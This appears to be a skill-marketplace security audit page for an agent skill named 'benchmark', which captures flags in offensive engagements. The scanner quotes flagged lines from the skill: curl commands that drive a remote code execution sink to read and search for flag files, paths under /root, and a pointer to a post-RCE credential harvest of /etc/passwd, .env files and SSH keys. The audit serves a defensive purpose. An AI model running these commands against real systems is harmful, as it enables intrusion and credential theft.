benchmark
Facilitates flag capture in benchmark mode for engagement objectives, utilizing specific commands and context for effective execution.
Install this skill
or
53/100
Security score
The benchmark skill was audited on Jun 8, 2026 and we found 7 security issues across 3 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Security Issues
medium line 52
Curl to non-GitHub URL
SourceSKILL.md
| 52 | result=$(curl -s "http://<TARGET>/<RCE_SINK>?cmd=cat+$f" 2>/dev/null | head -5) |
medium line 58
Curl to non-GitHub URL
SourceSKILL.md
| 58 | curl -s "http://<TARGET>/<RCE_SINK>?cmd=find+/+-type+f+\(-name+'flag*'-o+-name+'FLAG*'\)+-not+-path+'/proc/*'+-not+-path+'/sys/*'+2>/dev/null" \ |
critical line 69
Access to /etc/passwd
SourceSKILL.md
| 69 | The generic credential harvest (`/etc/passwd`, `.env`, configs, SSH keys, secret/cred/token files) lives in `/skills/standard/exploit/web/command-injection/SKILL.md` — run BOTH sweeps post-RCE; flag-p |
medium line 49
Access to root home directory
SourceSKILL.md
| 49 | for f in /opt/flag.txt /flag /flag.txt /root/flag.txt /root/flag \ |
medium line 69
Access to .env file
SourceSKILL.md
| 69 | The generic credential harvest (`/etc/passwd`, `.env`, configs, SSH keys, secret/cred/token files) lives in `/skills/standard/exploit/web/command-injection/SKILL.md` — run BOTH sweeps post-RCE; flag-p |
low line 52
External URL reference
SourceSKILL.md
| 52 | result=$(curl -s "http://<TARGET>/<RCE_SINK>?cmd=cat+$f" 2>/dev/null | head -5) |
low line 58
External URL reference
SourceSKILL.md
| 58 | curl -s "http://<TARGET>/<RCE_SINK>?cmd=find+/+-type+f+\(-name+'flag*'-o+-name+'FLAG*'\)+-not+-path+'/proc/*'+-not+-path+'/sys/*'+2>/dev/null" \ |
Scanned on Jun 8, 2026
View Security Dashboard